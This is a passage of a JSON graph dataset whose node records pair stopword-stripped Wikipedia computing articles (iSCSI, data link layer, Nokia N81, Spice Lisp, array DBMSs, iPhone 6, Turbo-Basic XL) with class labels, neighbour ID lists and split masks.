disk though iscsi tape medium-changer targets popular well far physical devices featured native iscsi interfaces component level instead devices parallel scsi fibre channel interfaces bridged using iscsi target software external bridges controllers internal device enclosure alternatively possible virtualize disk tape targets rather representing actual physical device emulated virtual device presented underlying implementation deviate drastically presented target done virtual tape library vtl products vtls use disk storage storing data written virtual tapes actual physical devices virtual targets presented using iscsi target software external bridges controllers internal device enclosure security products industry manufacturers use iscsi raid target initiator either ip-enabled encoder camera multiple systems exist allow fibre channel scsi sas devices attached ip network use via iscsi used allow migration older storage technologies access sans remote servers linking sans ip networks iscsi gateway bridges ip servers fibre channel sans tcp connection terminated gateway implemented fibre channel switch standalone appliance",
    "neighbors": [
      3328,
      514,
      2947,
      2564,
      7557,
      9218,
      1801,
      2314,
      6797,
      8471,
      1304,
      9625,
      8602,
      2974,
      3742,
      10272,
      9505,
      2723,
      3366,
      1450,
      3628,
      6445,
      10924,
      8625,
      6014,
      9906,
      2356,
      2996,
      10422,
      823,
      9655,
      5322,
      8266,
      1743,
      5457,
      6993,
      7126,
      6999,
      1880,
      216,
      3289,
      1115,
      10202,
      5472,
      3042,
      9571,
      10853,
      4074,
      2928,
      3441,
      7411,
      9844,
      4598,
      11382,
      1400,
      890,
      2811,
      1406,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 7864,
    "label": 5,
    "text": "SVDO:svdo svdo simultaneous voice ev-do data technology allows supported cdma2000 ev-do cellular phones maintain active 3g data session phone call previously capability able use data call found mobile phones using gsm cellular networks 2011 verizon released first svdo-supported phone htc thunderbolt following year sprint released first svdo-supported phone htc evo 4g lte although phones support lte already allows simultaneous voice data devices 3g data coverage use svdo 3g data session phone call",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 7865,
    "label": 5,
    "text": "Data_link_layer:data link layer data layer layer 2 second layer seven-layer osi model computer networking layer protocol layer transfers data adjacent network nodes wide area network wan nodes local area network lan segment data link layer provides functional procedural means transfer data network entities might provide means detect possibly correct errors may occur physical layer data link layer concerned local delivery frames nodes level network data-link frames protocol data units called cross boundaries local area network inter-network routing global addressing higher-layer functions allowing data-link protocols focus local delivery addressing media arbitration way data link layer analogous neighborhood traffic cop endeavors arbitrate parties contending access medium without concern ultimate destination devices attempt use medium simultaneously frame collisions occur data-link protocols specify devices detect recover collisions may provide mechanisms reduce prevent examples data link protocols ethernet local area networks multi-node point-to-point protocol ppp hdlc adccp point-to-point dual-node connections internet protocol suite tcp/ip data link layer functionality contained within link layer lowest layer descriptive model also includes functionality encompassed osi model physical layer frame header contains source destination addresses indicate device originated frame device expected receive process contrast hierarchical routable addresses network layer layer-2 addresses flat meaning part address used identify logical physical group address belongs data link thus provides data transfer across physical link transfer reliable unreliable many data-link protocols acknowledgments successful frame reception acceptance data-link protocols might even form checksum check transmission errors cases higher-level protocols must provide flow control error checking acknowledgments retransmission networks ieee 802 local area networks data link layer described detail media access control mac logical link control llc sublayers means ieee 802.2 llc protocol used ieee 802 mac layers ethernet token ring ieee 802.11 etc. well non-802 mac layers fddi data-link-layer protocols hdlc specified include sublayers although protocols cisco hdlc use hdlc low-level framing mac layer combination different llc layer itu-t g.hn standard provides way create high-speed 1 gigabit/s local area network using existing home wiring power lines phone lines coaxial cables data link layer divided three sub-layers application protocol convergence logical link control media access control within semantics osi network architecture data-link-layer protocols respond service requests network layer perform function issuing service requests physical layer data link layer two sublayers logical link control llc media access control mac uppermost sublayer llc multiplexes protocols running top data link layer optionally provides flow control acknowledgment error notification llc provides addressing control data link specifies mechanisms used addressing stations transmission medium controlling data exchanged originator recipient machines mac may refer sublayer determines allowed access media one time e.g csma/cd times refers frame structure delivered based mac addresses inside generally two forms media access control distributed centralized may compared communication people network made people speaking i.e conversation pause random amount time attempt speak effectively establishing long elaborate game saying first media access control sublayer also determines one frame data ends next one starts – frame synchronization four means frame synchronization time based character counting byte stuffing bit stuffing services data link layer provides beside framing data link layers also include mechanisms detect even recover transmission errors receiver detect transmission error sender must add redundant information form bits error detection code frame sent receiver obtains frame error detection code recomputes verifies whether received error detection code matches computed error detection code match frame considered valid error detection code defined function computes amount redundant bits corresponding string total number bits simplest error detection code parity bit allows receiver detect transmission errors affected single bit among transmitted bits multiple flipped bits checking method might able unveil receiver side advanced methods parity error detection exist providing higher grades quality features simple example works using metadata transmitting word hello encoding letter position alphabet thus letter coded 1 b 2 shown table right adding resulting numbers yields 8 5 12 12 15 52 5 2 7 calculates metadata finally 8 5 12 12 15 7 numbers sequence transmitted receiver see end transmission errors receiver knows last number received error-detecting metadata data message receiver recalculate math metadata matches concluded data received error-free though receiver sees something like 7 5 12 12 15 7 sequence first element altered error run check calculating 7 5 12 12 15 51 5 1 6 discard received data defective since 6 equal 7 internet protocol suite tcp/ip osi data link layer functionality contained within lowest layer link layer tcp/ip link layer operating scope link host connected concerns hardware issues point obtaining hardware mac addresses locating hosts link transmitting data frames onto link link layer functionality described rfc 1122 defined differently data link layer osi encompasses methods affect local link tcp/ip model top-down comprehensive design reference networks formulated purpose illustrating logical groups scopes functions needed design suite internetworking protocols tcp/ip needed operation internet general direct strict comparisons osi tcp/ip models avoided layering tcp/ip principal design criterion general considered harmful rfc 3439 particular tcp/ip dictate strict hierarchical sequence encapsulation requirements attributed osi protocols following table shows various networking models number layers varies three seven networking models textbooks secondary sources may conflict intent rfc 1122 ietf primary sources",
    "neighbors": [
      8192,
      10242,
      11267,
      1030,
      6670,
      8211,
      6681,
      7706,
      10271,
      10274,
      2085,
      4650,
      2091,
      562,
      11321,
      3133,
      5181,
      11332,
      71,
      8265,
      10830,
      4687,
      2640,
      10833,
      4691,
      10341,
      10344,
      10864,
      7811,
      9860,
      649,
      9868,
      2701,
      3218,
      9365,
      5270,
      11413,
      2206,
      3742,
      9380,
      9381,
      3751,
      1192,
      3752,
      10924,
      5809,
      6834,
      9909,
      2746,
      4797,
      702,
      2752,
      5825,
      706,
      7360,
      7364,
      10947,
      8391,
      9937,
      5843,
      1246,
      2785,
      751,
      8432,
      5875,
      7411,
      2294,
      6904,
      2306,
      6403,
      9987,
      3847,
      9992,
      5387,
      11536,
      1297,
      10005,
      5402,
      5405,
      8989,
      4918,
      7478,
      5437,
      5439,
      835,
      2887,
      11591,
      7498,
      2904,
      5469,
      5470,
      5471,
      2912,
      5472,
      10079,
      1893,
      11112,
      7017,
      367,
      6013,
      2431,
      1411,
      7049,
      2960,
      6544,
      5531,
      1437,
      5021,
      1955,
      2994,
      2996,
      10171,
      3006,
      4543,
      1478,
      9675,
      2509,
      7120,
      8669,
      9206,
      6651,
      5118
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7866,
    "label": 2,
    "text": "Nokia_N81:nokia n81 nokia n81 symbian os smartphone announced nokia 29 august 2007 released next month runs s60 3rd edition feature pack 1 n81 marketed entertainment device focused music gaming first device came preloaded n-gage 2.0 gaming service 2008 albeit public beta features two dedicated gaming keys used n-gage games would later also appear n96 n85 5730 xpressmusic launch n-gage 2.0 n81 specifically chosen nokia advertisements also much marketed music-centric smartphone one first support nokia music store service stereo speakers considered loud several reviewers claimed n81 much like older nokia n91 high sound output quality therefore highly suitable audiophiles four-way silver-coloured d-pad display also contains new capacitive sensor called navi wheel allows scrolling s60 gallery music player applications 'stroking key similar manner ipod click wheel unique feature rarely appears mobile handsets navi wheel would later also appear nokia nseries handsets n78 n85 n79 n81 modest specifications compared nokia n95 2-megapixel camera lacking gps hsdpa weighing 20 grams heavier however n81 arm11 369 mhz processor fastest nokia device time nokia n81 notably features sliding spring-loaded physical keylock top device located next 3.5 mm jack first nseries device swapped miniusb port favour microusb variant called n81 8gb 8-gigabytes internal flash memory also announced time version retailed 430 euros taxes 70 euros standard version requires microsd memory card expand 12 megabytes storage n81 would succeeded n85 nokia n81 lower sound output compared n91 due release new firmware version according nokia must follow international standard wherein device initial default volume must set low cause damage users cnet found buggy slow badly designed s21 gave 3/5 praising feature set criticising plasticky design however musical capabilities highly praised",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7867,
    "label": 9,
    "text": "Spice_Lisp:spice lisp spice lisp scientific personal integrated computing environment programming language dialect lisp implementation originally written carnegie mellon university cmu spice lisp group targeted microcode 16-bit workstation perq operating system accent used workstation microcode abilities provided microcodes languages pascal c ada implement stack machine architecture store data structures 32-bit objects enable run time type-checking would later popular workstations spice lisp evolved implementation common lisp renamed cmu common lisp cmucl",
    "neighbors": [
      10752,
      7173,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      4779,
      5803,
      2225,
      8883,
      4799,
      7880,
      8908,
      205,
      5837,
      7896,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1804,
      10510,
      1301,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      11083,
      8524,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      428,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 7868,
    "label": 1,
    "text": "Array_DBMS:array dbms array database management systems dbmss provide database services specifically arrays also called raster data homogeneous collections data items often called pixels voxels etc sitting regular grid one two dimensions often arrays used represent sensor simulation image statistics data arrays tend big data single objects frequently ranging terabyte soon petabyte sizes example today ’ earth space observation archives typically grow terabytes day array databases aim offering flexible scalable storage retrieval information category style standard database systems sets array dbmss offer scalable flexible storage flexible retrieval/manipulation arrays conceptually unlimited size practice arrays never appear standalone array model normally embedded overall data model relational model systems implement arrays analogy tables introduce arrays additional attribute type management arrays requires novel techniques particularly due fact traditional database tuples objects tend fit well single database page unit disk access server typically 4 kb array objects easily span several media prime task array storage manager give fast access large arrays sub-arrays end arrays get partitioned insertion so-called tiles chunks convenient size act units access query evaluation array dbmss offer query languages giving declarative access arrays allowing create manipulate search delete like e.g. sql expressions arbitrary complexity built top set core array operations due extensions made data query model array dbmss sometimes subsumed nosql category sense sql query optimization parallelization important achieving scalability actually many array operators lend well towards parallel evaluation processing tile separate nodes cores important application domains array dbmss include earth space life social sciences well related commercial applications hydrocarbon exploration industry olap business variety occurring observed e.g. geo data 1-d environmental sensor time series 2-d satellite images 3-d x/y/t image time series x/y/z geophysics data well 4-d x/y/z/t climate ocean data found relational data model prevailing today directly support array paradigm extent sets tuples iso sql lists array-valued attribute type one-dimensional almost operational support usable application domains array dbmss another option resort blobs binary large objects equivalent files byte strings conceptually unlimited length without query language functionality multi-dimensional subsetting first significant work going beyond blobs established picdms system offers precursor 2-d array query language albeit still procedural without suitable storage support first declarative query language suitable multiple dimensions algebra-based semantics published baumann together scalable architecture another array database language constrained 2-d presented marathe salem seminal theoretical work accomplished libkin et al model called ncra extend nested relational calculus multidimensional arrays among results important contributions array query complexity analysis map algebra suitable 2-d 3-d spatial raster data published mennis et al terms array dbms implementations rasdaman system longest implementation track record n-d arrays full query support oracle georaster offers chunked storage 2-d raster maps albeit without sql integration terralib open-source gis software extends object-relational dbms technology handle spatio-temporal data types main focus vector data also support rasters starting version 2.0 postgis embeds raster support 2-d rasters special function offers declarative raster query functionality sciql array query language added monetdb dbms scidb recent initiative establish array database support like sciql arrays seen equivalent tables rather new attribute type rasdaman postgis special case sparse data olap data cubes well established store cell values together location adequate compression technique face locations carrying valid information operate sql technique scale density standard databases used today dense data like satellite images cells carry meaningful information rather proprietary ad-hoc implementations prevail scientific data management similar situations hence array dbmss make particular contribution generally array dbmss emerging technology operationally deployed systems exist like oracle georaster postgis 2.0 rasdaman still many open research questions including query language design formalization query optimization parallelization distributed processing scalability issues general besides scientific communities still appear reluctant taking array database technology tend favor specialized proprietary technology adding arrays databases facets database design need reconsidered ranging conceptual modeling suitable operators storage management management arrays spanning multiple media query processing efficient processing strategies formally array given total partial function x → v x domain -dimensional integer interval 0 v called range non-empty value set set notation rewritten p v p x v v p v denotes array element cell following common notation write p v examples x include 0..767 × 0..1023 xga sized images examples v include 0..255 8-bit greyscale images 0..255 × 0..255 × 0..255 standard rgb imagery following established database practice array query language declarative safe evaluation iteration array heart array processing declarativeness much centers aspect requirement conceptually cells inspected simultaneously words query enforce explicit iteration sequence array cells evaluation evaluation safety achieved every query terminates finite number finite-time steps avoiding general loops recursion way achieving time avoiding explicit loop sequences opens manifold optimization opportunities example array query operators rasdaman algebra query language serve establish expression language minimal set array primitives begin generic core operators present common special cases shorthands marray operator creates array given domain extent initializes cells index-range-specification defines result domain binds iteration variable without specifying iteration sequence cell-value-expression evaluated location domain example “ cutout array given corner points 10,20 40,50 ” special case pure subsetting abbreviated subsetting keeps dimension array reduce dimension extracting slices single slicepoint value indicated slicing dimension example “ slice x/y/t timeseries position t=100 retrieving available data x y. ” wildcard operator indicates current boundary array used note arrays dimension boundaries left open definition time may change size dimensions array lifetime examples simply copied original values instead values may manipulated example “ array log applied cell value. ” abbreviated principle called induced operations query language offers operations cell type offers array level hence numeric values usual unary binary arithmetic exponential trigonometric operations available straightforward manner plus standard set boolean operators condense operator aggregates cell values one scalar result similar sql aggregates application general form marray index-range-specification specifies domain iterated binds iteration variable without specifying iteration sequence likewise cell-value-expression evaluated domain location condense-op clause specifies aggregating operation used combine cell value expressions one single value example sum values shorthand operation manner analogy sql aggregates number shorthands provided including counting average minimum maximum boolean quantifiers next example demonstrates combination marray condense operators deriving histogram example histogram 8-bit greyscale image induced comparison a=bucket establishes boolean array extent aggregation operator counts occurrences true value bucket subsequently put proper array cell 1-d histogram array languages allow formulating statistical imaging operations expressed analytically without using loops proven expressive power array languages principle equivalent relational query languages ranking array storage accommodate arrays different dimensions typically large sizes core task maintain spatial proximity disk reduce number disk accesses subsetting note emulation multi-dimensional arrays nested lists 1-d arrays per se accomplish therefore general lead scalable architectures commonly arrays partitioned sub-arrays form unit access regular partitioning partitions size except possibly boundaries referred chunking generalization removes restriction equally sized partitions supporting kind partitioning tiling array partitioning improve access array subsets significantly adjusting tiling access pattern server ideally fetch required data one disk access compression tiles sometimes reduce substantially amount storage needed also transmission results compression useful large amounts data consideration networks bandwidth often constitutes limiting factor tile-based storage structure suggests tile-by-tile processing strategy rasdaman called tile streaming large class practically relevant queries evaluated loading tile tile thereby allowing servers process arrays orders magnitude beyond main memory due massive sizes arrays scientific/technical applications combination often complex queries optimization plays central role making array queries efficient hardware software parallelization applied example heuristic optimization rule averaging array resulting cell-wise addition two input images equivalent adding averages input array replacing left-hand variant right-hand expression costs shrink three costly array traversals two array traversals plus one cheap scalar operation see figure uses rasdaman query language introduced many – – cases phenomenon sampled simulated result rasterized data set conveniently stored retrieved forwarded array typically array data ornamented metadata describing example geographically referenced imagery carry geographic position coordinate reference system expressed following representative domains large-scale multi-dimensional array data handled examples generally arrays frequently represent sensor simulation image statistics data spatial time dimensions combined abstract axes sales products one example abstract axes explicitly foreseen open_geospatial_consortium |open geospatial consortium ogc coverage model many communities established data exchange formats hdf netcdf tiff de facto standard earth science communities opendap data transport architecture protocol database specification offers important components characterize database system conceptual model client/server implementations declarative geo raster query language web coverage processing service wcps standardized open geospatial consortium ogc june 2014 iso/iec jtc1 sc32 wg3 maintains sql database standard decided add multi-dimensional array support sql new column type based initial array support available since new standard adopted fall 2018 named iso 9075 sql part 15 mda multi-dimensional arrays",
    "neighbors": [
      2688,
      5632,
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      1697,
      9634,
      9893,
      4263,
      2344,
      7080,
      10413,
      10286,
      9397,
      10294,
      4155,
      3004,
      9147,
      11324,
      10048,
      5953,
      11457,
      580,
      6085,
      9286,
      2512,
      2901,
      7802,
      7767,
      10326,
      11098,
      987,
      2780,
      4065,
      7650,
      8291,
      9828,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      6770,
      9075,
      1146,
      6395,
      3196,
      3454
    ],
    "mask": "None"
  },
  {
    "node_id": 7869,
    "label": 2,
    "text": "IPhone_6:iphone 6 iphone 6 iphone 6 plus smartphones designed marketed apple inc eighth generation iphone succeeding iphone 5s announced september 9 2014 released september 19 2014 iphone 6 iphone 6 plus jointly replaced flagship devices iphone series iphone 6s iphone 6s plus september 9 2015 iphone 6 6 plus include larger displays faster processor upgraded cameras improved lte wi-fi connectivity support near field communications-based mobile payments offering iphone 6 6 plus received positive reviews critics regarding redesign specifications camera battery life improvements previous iphone models however aspects design iphone 6 also panned including plastic strips rear device antenna disrupted otherwise metal exterior screen resolution standard-sized iphone 6 lower devices class pre-orders iphone 6 iphone 6 plus exceeded four million within first 24 hours availability—an apple record ten million iphone 6 iphone 6 plus devices sold first three days another apple record lifespan iphone 6 6 plus sold 220 million total making best selling iphone models far one successful phones date despite positive reception iphone 6 6 plus subject several hardware issues including prominently susceptible bending hard pressure dubbed bendgate byproduct lack rigidity touchscreen internal hardware susceptible losing connection phone logic board nicknamed touch disease additionally iphone 6 plus models subject camera issues including malfunctioning optical image stabilization otherwise defects rear cameras iphone 6 6 plus moved midrange spot apple iphone lineup iphone 6s 6s plus released september 2015 iphone 6 6 plus discontinued markets september 7 2016 apple announced iphone 7 iphone 7 plus spot entry-level iphone replaced iphone se released earlier march 31 2016 iphone 6 relaunched 32 gb storage asian markets february 2017 midrange/budget iphone later expanded europe hitting us markets may 2017 canada july 2017 iphone 6 6 plus supported ios 8 9 10 11 12 dropped ios 13 third support five versions ios iphone 4s iphone 5 launch original iphone iphone 4s iphones used 3.5-inch displays—which smaller screens used flagship phones competitors iphone 5 immediate successors featured display taller width prior models measuring 4 inches diagonally following apple loss smartphone market share companies producing phones larger displays reports early january 2014 suggested apple preparing launch new iphone models larger 4.7-inch 5.5-inch displays reports prior unveiling also speculated apple might use new iphone model introduce mobile payments platform using near-field communications—a technology incorporated many android phones experienced low adoption rate among users iphone 6 iphone 6 plus officially unveiled press event flint center performing arts cupertino california september 9 2014 released september 19 2014 pre-orders began september 12 2014 iphone 6 starting us 649 iphone 6 plus starting us 749 china iphone 5c 5s first models iphone series released country day international launch apple notified local wireless carriers would unable release iphone 6 iphone 6 plus 19th details ready local media reported devices yet approved ministry industry information technology earlier year news report state broadcaster china central television alleged iphone devices threat national security ios 7 frequent locations function could expose state secrets august 2015 apple initiated replacement program early iphone 6 plus found potentially faulty cameras could causing photos appear blurry september 9 2015 release iphone 6s iphone 6s plus iphone 6 6 plus moved mid-range iphone lineup 128 gb versions iphone 6 iphone 6 plus discontinued along gold version phones 16 gb 64 gb versions iphone 6 iphone 6 plus silver space gray remain available sale reduced price june 2016 apple faced potential sales ban china shenzhen baili chinese device maker alleged iphone 6 iphone 6 plus infringed design patent iphone 6 6 plus discontinued september 7 2016 apple announced iphone 7 iphone 7 plus iphone 6 6 plus spot entry-level iphone since taken iphone se iphone se powerful internal hardware midrange iphone 6 largely 6s released earlier march 31 2016 created unusual situation sold alongside iphone 6 6 plus september 7 despite marketed lower-tier iphone february 2017 iphone 6 quietly relaunched carrier stores online time storage changed 32 gb india sold amazon website space grey taiwan sold taiwan mobile march 10 gold colour mid-march released eu belarus via i-store web shop also makes appearance north america sprint based us prepaid carriers boost mobile virgin mobile along gophone distributed apple website retail stores design iphone 6 iphone 6 plus influenced ipad air glass front curved around edges display aluminum rear contains two plastic strips antenna back built 6000-series aluminum models come gold silver space gray finishes iphone 6 thickness iphone 6 plus thickness thinner iphone 5c iphone 5s iphone 6 apple thinnest phone date significant changes iphone 6 iphone 6 plus displays branded retina hd display ion-strengthened iphone 6 display 4.7 inches size resolution 1334x750 326 ppi minus one row pixels iphone 6 plus includes 5.5-inch 1920x1080 1080p display 401 ppi displays use multiple-domain lcd panel dubbed dual-domain pixels rgb pixels skewed pattern every pixel seen different angle technique helps improve viewing angles display accommodate larger physical size iphone 6 iphone 6 plus power button moved side phone instead top improve accessibility iphone 6 features 6.91 wh 1810 mah battery iphone 6 plus features 11.1 wh 2915 mah battery unlike previous model rear-facing camera flush rear device instead protrudes slightly models include apple a8 system-on-chip m8 motion co-processor—an update m7 chip iphone 5s primary difference m8 original m7 coprocessor m8 also includes barometer measure altitude changes phil schiller touted a8 chip would provide comparison 5s 25 increase cpu performance 50 increase graphics performance less heat output early hands-on reports suggested a8 gpu performance might indeed break away previous generations doubling performance yearly release scoring 21204.26 base mark x compared 20253.80 10973.36 5034.75 respectively 5s 5 4s expanded lte connectivity iphone 6 iphone 6 plus improved lte advanced support 20 lte bands seven iphone 5s 150 mbit/s download speed volte support wi-fi performance improved support 802.11ac specifications providing speeds 433.0581 mbit/s—which three times faster 802.11n along wi-fi calling support available iphone 6 iphone 6 plus add support near-field communications nfc initially used exclusively apple pay—a new mobile payments system allows users store credit cards passbook use online payments retail purchases nfc ios 11 added limited use near-field communications besides apple pay 3rd party apps iphone 6 rear-facing camera ability shoot 1080p video either 30 60 frames per second slow-motion video either 120 240 frames per second camera also includes phase detection autofocus iphone 6 plus camera nearly identical also includes optical image stabilization front-facing camera also updated new sensor f/2.2 aperture along support burst hdr modes first released iphone 6 iphone 6 plus supplied pre-loaded ios 8 iphone 5s supplied pre-loaded ios 7 apps able take advantage increased screen size iphone 6 6 plus display information on-screen example mail app uses dual-pane layout similar ipad version device landscape mode iphone 6 plus uses identical aspect ratio apps designed iphone 5 iphone 5c 5s upscaled use iphone 6 6 plus improve usability devices larger screens additional reachability gesture added double-tapping home button slide top half screen contents bottom half screen function allows users reach buttons located near top screen back button top-left corner june 2019 apple announced drop support iphone 6 6 plus release ios 13 iphone 6 models received generally positive reviews re/code called best smartphone buy techradar praised iphone 6 brilliant design improved battery life 5s ios 8 smarter intuitive ever along quality camera however plastic antenna strips rear phone criticized resulting poor aesthetics display lower resolution pixel density comparison recent smartphones – including physical screen size iphone 6 htc one sufficient justification significantly higher price comparison similar devices running android windows phone verge considered iphone 6 simply cleanly designed comparison 5s noting phone still felt usable despite larger size criticized antenna plastic protruding camera lens prevents device sitting flat without case lack additional optimization operating system bigger screen improvements performance battery life volte support tweaks also noted conclusion iphone 6 considered good even great ’ little ’ truly ambitious truly moving needle ’ refinement lot existing ideas much pleasant package regards 6 plus engadget panned design uncomfortable hold harder grip comparison devices galaxy note 3 lg g3 praised inclusion optical image stabilization slightly better battery life 6 iphone 6 6 plus affected number notable hardware-related issues including limited concerns surrounding rigidity led incidents surrounding chassis bending well degradation outright loss touchscreen functionality performance issues models larger storage capacity camera problems 6 plus model well initially undocumented error 53 appeared certain circumstances shortly public release reported iphone 6 iphone 6 plus chassis susceptible bending pressure carried tightly user pocket issues exclusive iphone 6 6 plus design flaw came known among users media apple responded bending allegations stating received nine complaints bent devices damage occurring due regular use extremely rare company maintained iphone 6 6 plus went durability testing ensure would stand daily use company offered replace phones bent determined bending unintentional october 1 2014 axel telzerow editor-in-chief german magazine computer bild reported following posting video presenter able bend iphone 6 plus apple germany representative informed publication banned future apple events would longer receive devices directly apple testing telzerow responded saying congratulate fine new generation iphones even one minor weakness casing deeply disappointed lack respect company october 3 2014 9to5mac released post claiming certain iphone 6 iphone 6 plus users complained social networking sites phone ripped hair held phone close ears making phone calls twitter users claimed seam glass screen aluminum back iphone 6 blame hair becoming caught within users reported 64 128 gb iphone 6 models experienced performance issues 128 gb iphone 6 plus models would rare cases randomly crash reboot business korea reported issues connected triple-layer cell nand storage affected models triple-layer cells store three bits data per cell flash cheaper dual-layer cell solutions cost performance reported apple planned switch affected model lines back multi-layer cell flash address performance issues existing devices future ios update reported optical image stabilization systems iphone 6 plus models faulty failing properly stabilize phone held perfectly still leading blurry photos wavy -looking videos optical image stabilization system also found affected accessories use magnets third-party lens attachments apple issued advisories users licensed accessory makers warning magnetic metallic accessories cause ois malfunction august 21 2015 apple instituted repair program iphone 6 plus models released september 2014 january 2015 citing faulty rear cameras affected models may produce blurry pictures iphone 6 iphone 6 plus models issue front-facing camera somehow shifted place apple stated would replace affected iphone 6 models issue free charge despite numerous complaints regarding issue seem affect camera said camera shifted piece protective foam around camera module gone place iphone 6 home button repaired modified third party device fail security checks related touch id components re-validated security reasons—a process performed authorized apple outlet failing checks disables features related touch id effects sometimes happened result damage well reported hardware integrity checks would trigger unrecoverable loop recovery mode ios updated restored attempts restore device via itunes software resulting error 53 message beyond explanation related hardware integrity errors regarding touch id components apple provided official explanation specifically triggers error 53 fixed without replacing entire device february 18 2016 apple released ios 9.2.1 patch itunes addresses issue admitted error 53 actually related diagnostic check inspecting touch id hardware iphone shipped factories touchscreen control components iphone 6 logic boards insufficient support including lack underfill—which strengthens stabilizes integrated circuits lack rigid metal shielding logic board unlike previous iphone models touchscreen controller instead shielded flexible sticker normal use device cause logic board flex internally strains touchscreen ic connectors leads degradation outright loss touchscreen functionality symptom associated type failure flickering grey bar near top display ifixit reported issue nicknamed touch disease byproduct previous bendgate design flaw device demonstrated lack rigidity larger iphone 6 plus susceptible flaw also reported small percentage iphone 6 models devices successor iphone 6s afflicted flaw due changes internal design included strengthening key points rear casing re-location touchscreen controllers display assembly logic board initially apple officially acknowledge issue issue widely discussed apple support forum—where posts discussing issue subject censorship touchscreen repaired via microsoldering apple stores equipped tools needed perform logic board repair led affected users sending devices unofficial third-party repair services apple store employee interviewed apple insider reported six months first started noticing problem apple issued guidance instructing tell affected users hardware issue could repaired iphone replaced however in-stock units also afflicted issue box leading employee stating tired pulling service stock box seeing exact problem customer replacement issue received mainstream attention august 2016 reported ifixit august 26 2016 apple insider reported based data four high-traffic apple store locations spike number iphone 6 devices brought repairs following mainstream reports touch disease problem august 30 2016 group three iphone 6 owners sued apple inc. united states district court northern district california filed proposed class action lawsuit alleging apple engaging unfair business practices long aware defective design yet refusing acknowledge repair november 17 2016 apple officially acknowledged issue announced paid repair program affected iphone 6 plus models stating iphone 6 plus devices may exhibit display flickering multi-touch issues dropped multiple times hard surface incurring stress device apple inc. announced within 24 hours availability 4 million pre-orders iphone 6 6 plus made exceeding supply available 10 million iphone 6 iphone 6 plus devices sold first three days",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      8735,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      7857,
      4283,
      3772,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      7541,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      2542,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 7870,
    "label": 9,
    "text": "Turbo-Basic_XL:turbo-basic xl turbo-basic xl advanced version basic programming language atari 8-bit family home computers compatible superset atari basic built-in atari machines era turbo-basic xl notable feature vastly improved execution speed atari basic program loaded turbo-basic changes made would generally run three times fast turbo-basic xl compiler also available created binary executables speeding program performance ten times faster atari basic turbo-basic xl developed frank ostrowski published december 1985 issue german computer magazine happy computer version 400/800 models released shortly known frost basic 1.4 since release 1979 8-bit family normally shipped version atari basic rom cartridge built internal roms later machines version basic number custom commands allowed partial access system advanced features like graphics sound however also notoriously slow appearing bottom list microcomputer basics original version david ahl creative computing benchmark poor performance official atari basic led market 3rd party basics better performance commands among official port microsoft basic sold atari several new versions released optimized systems software written original atari basic contract many others also several atari basic compilers turbo-basic xl late entry list first published december 1985 type-in program unique came interpreter compiler versions included code take advantage expanded memory available xl series machines later xe series meant could run original 400/800 systems led ostrowski make port known frost basic short frank ostrowski tied 